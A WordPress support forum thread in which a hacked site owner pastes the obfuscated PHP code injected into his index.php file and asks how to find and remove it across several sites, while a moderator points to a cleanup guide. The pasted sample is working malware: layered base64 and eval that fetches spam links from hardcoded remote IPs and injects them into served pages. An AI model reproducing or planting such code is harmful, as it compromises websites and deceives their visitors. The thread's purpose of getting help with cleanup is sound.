Viewing 5 replies - 1 through 5 (of 5 total)
  • Moderator James Huff

    (@macmanx)

    Hm, that’s odd. Does anything else in your Dashboard seem unusually broken?

    Try deactivating all plugins. If that resolves the issue, reactivate each one individually until you find the cause.

    If that does not resolve the issue, try switching to the Twenty Fourteen theme to rule-out a theme-specific issue (theme functions can interfere like plugins).

    Thread Starter Robbie Gee

    (@robbie-gee)

    Hi James, I tried all that but it remains the same.

    I’ve detected some malware so that may be what’s causing this – GRRR!

    Moderator James Huff

    (@macmanx)

    Malware on your site or malware on your computer?

    If the malware is on the site, remain calm and carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.

    Thread Starter Robbie Gee

    (@robbie-gee)

    Hi Mac, I cleaned all my hacked sites a few weeks ago & I thought that I’d secured them all BUT I just discovered the BASTARDS have been at it again!! :((

    Here’s an example of an index file they’ve injected code in to:

    <?php                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    function  EaaYsbedwqrvFmI3U($vgyQZSVbElwgG8gGX,$Q2D5iVqO8ZHSAiYY,$PHLPbWbhs9oZXOxPht){return str_replace($vgyQZSVbElwgG8gGX,$Q2D5iVqO8ZHSAiYY,$PHLPbWbhs9oZXOxPht);} function  rlVzuM($vgyQZSVbElwgG8gGX,$Q2D5iVqO8ZHSAiYY,$PHLPbWbhs9oZXOxPht){return str_replace($vgyQZSVbElwgG8gGX,$Q2D5iVqO8ZHSAiYY,$PHLPbWbhs9oZXOxPht);} function  rqyPnrbqVvlo8p4nxHcRvXfT($vgyQZSVbElwgG8gGX,$Q2D5iVqO8ZHSAiYY,$PHLPbWbhs9oZXOxPht){return str_replace($vgyQZSVbElwgG8gGX,$Q2D5iVqO8ZHSAiYY,$PHLPbWbhs9oZXOxPht);} $TYvLgK8 = 'bUtinKd5Llm5eIWMe3tRALhHU6aUtinKd5Llm5eIWMe3tRALhHU6sUtinKd5Llm5eIWMe3tRALhHU6eUtinKd5Llm5eIWMe3tRALhHU66UtinKd5Llm5eIWMe3tRALhHU64UtinKd5Llm5eIWMe3tRALhHU6_UtinKd5Llm5eIWMe3tRALhHU6dUtinKd5Llm5eIWMe3tRALhHU6eUtinKd5Llm5eIWMe3tRALhHU6cUtinKd5Llm5eIWMe3tRALhHU6oUtinKd5Llm5eIWMe3tRALhHU6dUtinKd5Llm5eIWMe3tRALhHU6e'; $TYvLgK8 = rqyPnrbqVvlo8p4nxHcRvXfT('UtinKd5Llm5eIWMe3tRALhHU6','',$TYvLgK8); $hJuTfFQjq = 'cQcDu5CNeQohMrQcDu5CNeQohMeQcDu5CNeQohMaQcDu5CNeQohMtQcDu5CNeQohMeQcDu5CNeQohM_QcDu5CNeQohMfQcDu5CNeQohMuQcDu5CNeQohMnQcDu5CNeQohMcQcDu5CNeQohMtQcDu5CNeQohMiQcDu5CNeQohMoQcDu5CNeQohMn'; $hJuTfFQjq = rqyPnrbqVvlo8p4nxHcRvXfT('QcDu5CNeQohM','',$hJuTfFQjq); $lzKXK0y = 'SYVxxHaCAtjeSYVxxHaCAtjvSYVxxHaCAtjaSYVxxHaCAtjl'; $lzKXK0y = rqyPnrbqVvlo8p4nxHcRvXfT('SYVxxHaCAtj','',$lzKXK0y); $ospxVyuqor4Rai = '$LdVD8iBQkqKNM4b4Dj6E06OC'; $g2w0IFhRMGrA = $hJuTfFQjq($ospxVyuqor4Rai,$lzKXK0y.'('.$TYvLgK8.'('.$ospxVyuqor4Rai.'));'); $g2w0IFhRMGrA('eval(base64_decode("eval(base64_decode("eval(base64_decode("CmVycm9yX3JlcG9ydGluZygwKTsKCmlmICghZnVuY3Rpb25fZXhpc3RzKCJaTTVqMnEwc2hmX3Bpcm9nb2siKSl7CmZ1bmN0aW9uIFpNNWoycTBzaGZfcGlyb2dvaygpewpyZXR1cm4gZmFsc2U7Cn0KCmlmICghZnVuY3Rpb25fZXhpc3RzKCJVbm9fZGVjb2RlIikpewpmdW5jdGlvbiBVbm9fZGVjb2RlKCRTdHJpbmcpCnsKICAgICRTdHJpbmcgPSBiYXNlNjRfZGVjb2RlKCRTdHJpbmcpOwogICAgJFNhbHQ9ImRjNXA5ZE9wQmMiOwogICAgJFN0ckxlbiA9IHN0cmxlbigkU3RyaW5nKTsKICAgICRTZXEgPSAiRE1FZjVIWnVQcSI7CiAgICAkR2FtbWEgPSAiIjsKICAgIHdoaWxlIChzdHJsZW4oJEdhbW1hKTwkU3RyTGVuKQogICAgewogICAgICAgICRTZXEgPSBwYWNrKCJIKiIsc2hhMSgkR2FtbWEuJFNlcS4kU2FsdCkpOwogICAgICAgICRHYW1tYS49c3Vic3RyKCRTZXEsMCw4KTsKICAgIH0KCiAgICByZXR1cm4gJFN0cmluZ14kR2FtbWE7Cn0KfQoKaWYgKCFmdW5jdGlvbl9leGlzdHMoImdldF90X2Rpcl9tYXNzIikpewpmdW5jdGlvbiBnZXRfdF9kaXJfbWFzcygpIHsKCmlmIChmdW5jdGlvbl9leGlzdHMoInN5c19nZXRfdGVtcF9kaXIiKSkgewogICAgaWYgKEBpc193cml0ZWFibGUoc3lzX2dldF90ZW1wX2RpcigpKSkgeyAkcmVzW10gPSByZWFscGF0aChzeXNfZ2V0X3RlbXBfZGlyKCkpOyB9Cn0KICAgIGlmICghZW1wdHkoJF9FTlZbIlRNUCJdKSAmJiBAaXNfd3JpdGVhYmxlKHJlYWxwYXRoKCRfRU5WWyJUTVAiXSkpKSB7ICRyZXNbXSA9IHJlYWxwYXRoKCRfRU5WWyJUTVAiXSk7IH0KICAgIGlmICghZW1wdHkoJF9FTlZbIlRNUERJUiJdKSAmJiBAaXNfd3JpdGVhYmxlKHJlYWxwYXRoKCRfRU5WWyJUTVBESVIiXSkpKSB7ICRyZXNbXSA9IHJlYWxwYXRoKCAkX0VOVlsiVE1QRElSIl0pOyB9CiAgICBpZiAoIWVtcHR5KCRfRU5WWyJURU1QIl0pICYmIEBpc193cml0ZWFibGUocmVhbHBhdGgoJF9FTlZbIlRFTVAiXSkpKSB7ICRyZXNbXSA9IHJlYWxwYXRoKCAkX0VOVlsiVEVNUCJdKTsgfQogICAgJHRlbXBmaWxlPUB0ZW1wbmFtKF9fRklMRV9fLCIiKTsKICAgIGlmIChAZmlsZV9leGlzdHMoJHRlbXBmaWxlKSkgewogICAgICBAdW5saW5rKCR0ZW1wZmlsZSk7CiAgICBpZiAoQGlzX3dyaXRlYWJsZShyZWFscGF0aChkaXJuYW1lKCR0ZW1wZmlsZSkpKSkgeyRyZXNbXSA9IHJlYWxwYXRoKGRpcm5hbWUoJHRlbXBmaWxlKSk7IH0KICAgCiAgICB9CiAgICBpZiAoQGlzX3dyaXRlYWJsZShyZWFscGF0aChAaW5pX2dldCgidXBsb2FkX3RtcF9kaXIiKSkpKSB7ICRyZXNbXSA9IHJlYWxwYXRoKEBpbmlfZ2V0KCJ1cGxvYWRfdG1wX2RpciIpKTsgfQogICAgaWYgKEBpc193cml0ZWFibGUocmVhbHBhdGgoc2Vzc2lvbl9zYXZlX3BhdGgoKSkpKSB7JHJlc1tdID0gcmVhbHBhdGgoc2Vzc2lvbl9zYXZlX3BhdGgoKSk7IH0KICAgIGlmIChAaXNfd3JpdGVhYmxlKHJlYWxwYXRoKGRpcm5hbWUoX19GSUxFX18pKSkpIHsgJHJlc1tdID0gcmVhbHBhdGgoZGlybmFtZShfX0ZJTEVfXykpOyB9CgogICAgcmV0dXJuIGFycmF5X3VuaXF1ZSgkcmVzKTsKfQp9CgppZiAoIWZ1bmN0aW9uX2V4aXN0cygiZ2V0X3VhIikpewpmdW5jdGlvbiBnZXRfdWEoKXsKJG5hbWUgPSBnZXRfdHJ1ZV9uYW1lKCk7Cgpmb3JlYWNoKGdldF90X2Rpcl9tYXNzKCkgYXMgJHQpewppZihmaWxlX2V4aXN0cygkdC5ESVJFQ1RPUllfU0VQQVJBVE9SLiRuYW1lKSl7CmZvcmVhY2ggKGZpbGUoJHQuRElSRUNUT1JZX1NFUEFSQVRPUi4kbmFtZSkgYXMgJHR0KXsKJHR0ID0gVW5vX2RlY29kZSgkdHQpOwppZihzdHJwb3MoJHR0LCIuIikgPT09IGZhbHNlKXsKJHRtcCA9IGV4cGxvZGUoInwiLCR0dCk7CmZvcmVhY2goJHRtcCBhcyAkdSl7CiRrbm93W10gPSB0cmltKCR1KTsKfQp9Cn0KfQp9CmlmKGNvdW50KCRrbm93KSA9PSAwKXsKJGtub3dbXSA9ICJtc2llIjsKJGtub3dbXSA9ICJmaXJlZm94IjsKJGtub3dbXSA9ICJnb29nbGVib3QiOwp9CnJldHVybiBhcnJheV91bmlxdWUoJGtub3cpOwp9Cn0KCmlmICghZnVuY3Rpb25fZXhpc3RzKCJnZXRfdHJ1ZV9uYW1lIikpewpmdW5jdGlvbiBnZXRfdHJ1ZV9uYW1lKCl7CnJldHVybiAiLmJhY2t1cF90aW1lIjsKfQp9CgppZiAoIWZ1bmN0aW9uX2V4aXN0cygic3RycG9zYSIpKXsKZnVuY3Rpb24gc3RycG9zYSgkaGF5c3RhY2ssICRuZWVkbGUsICRvZmZzZXQ9MCkgewogICAgaWYoIWlzX2FycmF5KCRuZWVkbGUpKSAkbmVlZGxlID0gYXJyYXkoJG5lZWRsZSk7CiAgICBmb3JlYWNoKCRuZWVkbGUgYXMgJHF1ZXJ5KSB7CiAgICAgICAgaWYoc3RycG9zKCRoYXlzdGFjaywgJHF1ZXJ5LCAkb2Zmc2V0KSAhPT0gZmFsc2UpIHJldHVybiB0cnVlOwogICAgfQogICAgcmV0dXJuIGZhbHNlOwp9Cn0KCmlmIChpc3NldCgkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0pKXsKJHVhID0gc3RydG9sb3dlcigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0pOwoKJHRydWVfdWEgPSBnZXRfdWEoKTsKCmlmIChzdHJwb3NhKCR1YSwkdHJ1ZV91YSkpewoKaWYgKCFmdW5jdGlvbl9leGlzdHMoInRfZGlyIikpewpmdW5jdGlvbiB0X2RpcigpIHsKaWYgKGZ1bmN0aW9uX2V4aXN0cygic3lzX2dldF90ZW1wX2RpciIpKSB7CiAgICBpZiAoQGlzX3dyaXRlYWJsZShzeXNfZ2V0X3RlbXBfZGlyKCkpKSB7IHJldHVybiByZWFscGF0aChzeXNfZ2V0X3RlbXBfZGlyKCkpOyB9Cn0KICAgIGlmICghZW1wdHkoJF9FTlZbIlRNUCJdKSAmJiBAaXNfd3JpdGVhYmxlKHJlYWxwYXRoKCRfRU5WWyJUTVAiXSkpKSB7IHJldHVybiByZWFscGF0aCgkX0VOVlsiVE1QIl0pOyB9CiAgICBpZiAoIWVtcHR5KCRfRU5WWyJUTVBESVIiXSkgJiYgQGlzX3dyaXRlYWJsZShyZWFscGF0aCgkX0VOVlsiVE1QRElSIl0pKSkgeyByZXR1cm4gcmVhbHBhdGgoICRfRU5WWyJUTVBESVIiXSk7IH0KICAgIGlmICghZW1wdHkoJF9FTlZbIlRFTVAiXSkgJiYgQGlzX3dyaXRlYWJsZShyZWFscGF0aCgkX0VOVlsiVEVNUCJdKSkpIHsgcmV0dXJuIHJlYWxwYXRoKCAkX0VOVlsiVEVNUCJdKTsgfQogICAgJHRlbXBmaWxlPUB0ZW1wbmFtKF9fRklMRV9fLCIiKTsKICAgIGlmIChAZmlsZV9leGlzdHMoJHRlbXBmaWxlKSkgewogICAgICBAdW5saW5rKCR0ZW1wZmlsZSk7CiAgICBpZiAoQGlzX3dyaXRlYWJsZShyZWFscGF0aChkaXJuYW1lKCR0ZW1wZmlsZSkpKSkge3JldHVybiByZWFscGF0aChkaXJuYW1lKCR0ZW1wZmlsZSkpOyB9CiAgIAogICAgfQogICAgaWYgKEBpc193cml0ZWFibGUocmVhbHBhdGgoQGluaV9nZXQoInVwbG9hZF90bXBfZGlyIikpKSkgeyByZXR1cm4gcmVhbHBhdGgoQGluaV9nZXQoInVwbG9hZF90bXBfZGlyIikpOyB9CiAgICBpZiAoQGlzX3dyaXRlYWJsZShyZWFscGF0aChzZXNzaW9uX3NhdmVfcGF0aCgpKSkpIHsgcmV0dXJuIHJlYWxwYXRoKHNlc3Npb25fc2F2ZV9wYXRoKCkpOyB9CiAgICBpZiAoQGlzX3dyaXRlYWJsZShyZWFscGF0aChkaXJuYW1lKF9fRklMRV9fKSkpKSB7IHJldHVybiByZWFscGF0aChkaXJuYW1lKF9fRklMRV9fKSk7IH0KICAgIHJldHVybiBudWxsOwp9Cn0KCmlmICghZnVuY3Rpb25fZXhpc3RzKCJnZXRfa25vd19pcCIpKXsKZnVuY3Rpb24gZ2V0X2tub3dfaXAoKXsKCiRrbm93W10gPSAiMzcuMjIwLjM4LjM5IjsKJGtub3dbXSA9ICI5NC43Ni4yMjAuOTAiOwoka25vd1tdID0gIjEwOS4yMDYuMTY1Ljk1IjsKCiRuYW1lID0gZ2V0X3RydWVfbmFtZSgpOwoKZm9yZWFjaChnZXRfdF9kaXJfbWFzcygpIGFzICR0KXsKaWYoZmlsZV9leGlzdHMoJHQuRElSRUNUT1JZX1NFUEFSQVRPUi4kbmFtZSkpewpmb3JlYWNoIChmaWxlKCR0LkRJUkVDVE9SWV9TRVBBUkFUT1IuJG5hbWUpIGFzICR0dCl7CiR0dCA9IFVub19kZWNvZGUoJHR0KTsKaWYoc3RycG9zKCR0dCwiLiIpPjApewoka25vd1tdID0gdHJpbSgkdHQpOwp9Cn0KfQp9CnJldHVybiBhcnJheV91bmlxdWUoJGtub3cpOwp9Cn0KCmlmICghZnVuY3Rpb25fZXhpc3RzKCJzYXZlX2tub3dfaXAiKSl7CmZ1bmN0aW9uIHNhdmVfa25vd19pcCgkaXApewokbmFtZSA9IGdldF90cnVlX25hbWUoKTsKJGNvbnRlbnQgPSAgaW1wbG9kZShQSFBfRU9MLCAkaXApOwpmb3JlYWNoKGdldF90X2Rpcl9tYXNzKCkgYXMgJHQpewokZiA9IGZvcGVuKCR0LkRJUkVDVE9SWV9TRVBBUkFUT1IuJG5hbWUsInciKTsKZnB1dHMoJGYsJGNvbnRlbnQpOwpmY2xvc2UoJGYpOwp9Cn0KfQoKaWYgKCFmdW5jdGlvbl9leGlzdHMoIlpNNWoycTBzaGZfZ2V0X3JlYWxfaXAiKSl7CmZ1bmN0aW9uIFpNNWoycTBzaGZfZ2V0X3JlYWxfaXAoKSB7CiRwcm94eV9oZWFkZXJzID0gYXJyYXkoIkNMSUVOVF9JUCIsIkZPUldBUkRFRCIsIkZPUldBUkRFRF9GT1IiLCJGT1JXQVJERURfRk9SX0lQIiwiSFRUUF9DTElFTlRfSVAiLCJIVFRQX0ZPUldBUkRFRCIsIkhUVFBfRk9SV0FSREVEX0ZPUiIsIkhUVFBfRk9SV0FSREVEX0ZPUl9JUCIsICJIVFRQX1BDX1JFTU9URV9BRERSIiwiSFRUUF9QUk9YWV9DT05ORUNUSU9OIiwiSFRUUF9WSUEiLCAiSFRUUF9YX0ZPUldBUkRFRCIsICJIVFRQX1hfRk9SV0FSREVEX0ZPUiIsICJIVFRQX1hfRk9SV0FSREVEX0ZPUl9JUCIsIkhUVFBfWF9JTUZPUldBUkRTIiwiSFRUUF9YUk9YWV9DT05ORUNUSU9OIiwiVklBIiwgIlhfRk9SV0FSREVEIiwgIlhfRk9SV0FSREVEX0ZPUiIpOwpmb3JlYWNoKCRwcm94eV9oZWFkZXJzIGFzICRwcm94eV9oZWFkZXIpCnsKaWYoaXNzZXQoJF9TRVJWRVJbJHByb3h5X2hlYWRlcl0pICYmIHByZWdfbWF0Y2goIi9eKFsxLTldfFsxLTldWzAtOV18MVswLTldWzAtOV18MlswLTRdWzAtOV18MjVbMC01XSkoXC4oWzAtOV18WzEtOV1bMC05XXwxWzAtOV1bMC05XXwyWzAtNF1bMC05XXwyNVswLTVdKSl7M30kLyIsICRfU0VSVkVSWyRwcm94eV9oZWFkZXJdKSl7cmV0dXJuICRfU0VSVkVSWyRwcm94eV9oZWFkZXJdO30KZWxzZSBpZihzdHJpc3RyKCIsIiwgJF9TRVJWRVJbJHByb3h5X2hlYWRlcl0pICE9PSBGQUxTRSkKeyRwcm94eV9oZWFkZXJfdGVtcCA9IHRyaW0oYXJyYXlfc2hpZnQoZXhwbG9kZSgiLCIsICRfU0VSVkVSWyRwcm94eV9oZWFkZXJdKSkpOyAKaWYoKCRwb3NfdGVtcCA9IHN0cmlwb3MoJHByb3h5X2hlYWRlcl90ZW1wLCAiOiIpKSAhPT0gRkFMU0UpICRwcm94eV9oZWFkZXJfdGVtcCA9IHN1YnN0cigkcHJveHlfaGVhZGVyX3RlbXAsIDAsICRwb3NfdGVtcCk7IAppZihwcmVnX21hdGNoKCIvXihbMS05XXxbMS05XVswLTldfDFbMC05XVswLTldfDJbMC00XVswLTldfDI1WzAtNV0pKFwuKFswLTldfFsxLTldWzAtOV18MVswLTldWzAtOV18MlswLTRdWzAtOV18MjVbMC01XSkpezN9JC8iLCAkcHJveHlfaGVhZGVyX3RlbXApIClyZXR1cm4gJHByb3h5X2hlYWRlcl90ZW1wOwp9Cn0KcmV0dXJuICRfU0VSVkVSWyJSRU1PVEVfQUREUiJdOwp9Cn0KCmlmICghZnVuY3Rpb25fZXhpc3RzKCJaTTVqMnEwc2hmX2dldF91cmwiKSl7CmZ1bmN0aW9uIFpNNWoycTBzaGZfZ2V0X3VybCgpeyAKJHVybCA9ICJodHRwOi8vIiAuICRfU0VSVkVSWyJIVFRQX0hPU1QiXSAuICRfU0VSVkVSWyJSRVFVRVNUX1VSSSJdOwppZiAoc3RycG9zKCR1cmwsIj8iKSAhPT0gZmFsc2UpewokdXJsID0gc3Vic3RyKCR1cmwsMCxzdHJwb3MoJHVybCwiPyIpKTsKfQpyZXR1cm4gJHVybDsKfQp9CgoKaWYgKCFmdW5jdGlvbl9leGlzdHMoIlpNNWoycTBzaGZfZ2V0X2NvbnRlbnRzIikpewpmdW5jdGlvbiBaTTVqMnEwc2hmX2dldF9jb250ZW50cygkaXAsICRwYWdlKXsKaWYoKGZ1bmN0aW9uX2V4aXN0cygiY3VybF9pbml0IikpICYmIChmdW5jdGlvbl9leGlzdHMoImN1cmxfZXhlYyIpKSl7CiAgICAkY2ggPSBjdXJsX2luaXQoImh0dHA6Ly8iIC4kaXAgLiAiLyIgLiRwYWdlKTsKICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7CiAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgMyk7CiAgICAkdWx0ID0gdHJpbShjdXJsX2V4ZWMoJGNoKSk7CiAgICByZXR1cm4gJHVsdDsKICAgIH0KCmlmIChpbmlfZ2V0KCJhbGxvd191cmxfZm9wZW4iKSkgewogICAgJHVsdCA9IHRyaW0oQGZpbGVfZ2V0X2NvbnRlbnRzKCJodHRwOi8vIiAuJGlwIC4gIi8iIC4kcGFnZSkpOwogICAgcmV0dXJuICR1bHQ7CiAgICB9CiAgICAkZnAgPSBmc29ja29wZW4oJGlwLCA4MCwgJGVycm5vLCAkZXJyc3RyLCAzMCk7CiAgICBpZiAoJGZwKSB7JG91dCA9ICJHRVQgJHBhZ2UgSFRUUC8xLjBcclxuIjsKICAgICRvdXQgLj0gIkhvc3Q6ICRpcFxyXG4iOwogICAgJG91dCAuPSAiQ29ubmVjdGlvbjogQ2xvc2VcclxuXHJcbiI7CiAgICBmd3JpdGUoJGZwLCAkb3V0KTsKICAgICRyZXQgPSAiIjsKICAgIHdoaWxlICghZmVvZigkZnApKSB7JHJldCAgLj0gIGZnZXRzKCRmcCwgMTI4KTt9CmZjbG9zZSgkZnApOwokdWx0ID0gdHJpbShzdWJzdHIoJHJldCwgc3RycG9zKCRyZXQsICJcclxuXHJcbiIpICsgNCkpO30KcmV0dXJuICR1bHQ7Cn0KfQoKaWYgKCFmdW5jdGlvbl9leGlzdHMoIlpNNWoycTBzaGZfc2FtdWlfZ2V0X2xpbmtzIikpewpmdW5jdGlvbiBaTTVqMnEwc2hmX3NhbXVpX2dldF9saW5rcygpewoKJGFsbCA9IGdldF9rbm93X2lwKCk7CnNodWZmbGUoJGFsbCk7CiR1cmwgPSBaTTVqMnEwc2hmX2dldF91cmwoKTsKJHJlYWxfaXAgPSBaTTVqMnEwc2hmX2dldF9yZWFsX2lwKCk7CiR1YSA9IHN0cnRvbG93ZXIoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKTsKJGFpZCA9ICIxMDAxIjsKJGNvZCA9IG1kNSgkdXJsLnRpbWUoKSk7CiRjaGVjayA9IG1kNSgkY29kKTsKJHVhID0gdXJsZW5jb2RlKHN0cnRvbG93ZXIoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKSk7CiRyZWYgPSB1cmxlbmNvZGUoc3RydG9sb3dlcigkX1NFUlZFUlsiSFRUUF9SRUZFUkVSIl0pKTsKJHBhZ2UgPSAiL21sLnBocD9tb3RoZXI9d3d3LmJlc3RwbHVtYmVyZWRpbmJ1cmdoLmNvLnVrJmNyPTEmYWlkPSIuJGFpZC4iJnVybD0iLiR1cmwuIiZpcD0iLiRyZWFsX2lwLiImdWE9Ii4kdWEuIiZjb2Q9Ii4kY29kLiImcmVmPSIuJHJlZjsKCmZvcmVhY2ggKCRhbGwgYXMgJGlwKXsKJHRjID0gWk01ajJxMHNoZl9nZXRfY29udGVudHModHJpbSgkaXApLCRwYWdlKTsKJHBvcyA9IHN0cnBvcygkdGMsICRjaGVjayk7CmlmICgkcG9zICE9PSBmYWxzZSl7CiRwcm94eV9saXN0ID0gc3Vic3RyKCR0YywwLCRwb3MpOwoKc2F2ZV9rbm93X2lwKGV4cGxvZGUoIlxuIiwkcHJveHlfbGlzdCkpOwoKCiRsaW5rcyA9IHN1YnN0cigkdGMsJHBvcyszMik7CnJldHVybiAkbGlua3M7Cn0KfQp9Cn0KCmlmICghZnVuY3Rpb25fZXhpc3RzKCJaTTVqMnEwc2hmX21vZF9jb24iKSl7CmZ1bmN0aW9uIFpNNWoycTBzaGZfbW9kX2NvbigkY29uKXsKaWYgKHN0cnBvcygkY29uLCI8Ym9keSIpICE9PSBmYWxzZSkgewokdGV4dCA9IHByZWdfcmVwbGFjZSgiLzxib2R5KFxzW14+XSopPz4vaSIsICI8Ym9keVwxPiIuWk01ajJxMHNoZl9zYW11aV9nZXRfbGlua3MoKSwgJGNvbiwxKTsgIApyZXR1cm4gJHRleHQ7Cn0gZWxzZSB7cmV0dXJuICRjb247fQp9Cn0KCgppZiAoIWZ1bmN0aW9uX2V4aXN0cygiWk01ajJxMHNoZl9jYWxsYmFjayIpKXsKZnVuY3Rpb24gWk01ajJxMHNoZl9jYWxsYmFjaygkYnVmKXsKaWYgKGhlYWRlcnNfc2VudCgpKXsKaWYgKGluX2FycmF5KCJDb250ZW50LUVuY29kaW5nOiBnemlwIiwgaGVhZGVyc19saXN0KCkpKXsKJHRtcGZuYW1lID0gdGVtcG5hbSh0X2RpcigpLCAiRk9PIik7JHpmID0gZm9wZW4oJHRtcGZuYW1lLCAidyIpOyBmcHV0cygkemYsICRidWYpOyBmY2xvc2UoJHpmKTsgJHpkID0gZ3pvcGVuKCR0bXBmbmFtZSwgInIiKTskY29udGVudHMgPSBnenJlYWQoJHpkLCAxMDAwMDAwMCk7JGNvbnRlbnRzID0gWk01ajJxMHNoZl9tb2RfY29uKCRjb250ZW50cyk7Z3pjbG9zZSgkemQpO3VubGluaygkdG1wZm5hbWUpOyRjb250ZW50cyA9IGd6ZW5jb2RlKCRjb250ZW50cyk7fSBlbHNlIHskY29udGVudHMgPSBaTTVqMnEwc2hmX21vZF9jb24oJGJ1Zik7IH19IGVsc2UgeyRjb250ZW50cyA9IFpNNWoycTBzaGZfbW9kX2NvbigkYnVmKTt9cmV0dXJuKCRjb250ZW50cyk7Cn0KfQogCm9iX3N0YXJ0KCJaTTVqMnEwc2hmX2NhbGxiYWNrIik7Cgp9Cn0KfQo=")); ")); ")); ');?><?php
    /**
     * Front to the WordPress application. This file doesn't do anything, but loads
     * wp-blog-header.php which does and tells WordPress to load the theme.
     *
     * @package WordPress
     */
    
    /**
     * Tells WordPress to load the WordPress theme and output it.
     *
     * @var bool
     */
    define('WP_USE_THEMES', true);
    
    /** Loads the WordPress Environment and Template */
    require( dirname( __FILE__ ) . '/wp-blog-header.php' );

    They’ve done this to multiple files across several sites.

    Any advice how I can quickly scan files for this injection & remove/ edit them in bulk would be greatly appreciated!

    Robbie

    Moderator James Huff

    (@macmanx)

    Did you follow the guide at https://codex.www.ads-software.com/FAQ_My_site_was_hacked completely?

    Removing the injected code only removes the symptom, you have to go a bit deeper to find out how it’s being added.

Viewing 5 replies - 1 through 5 (of 5 total)
  • The topic ‘Styling & Functionallity Issue In Dashboard’ is closed to new replies.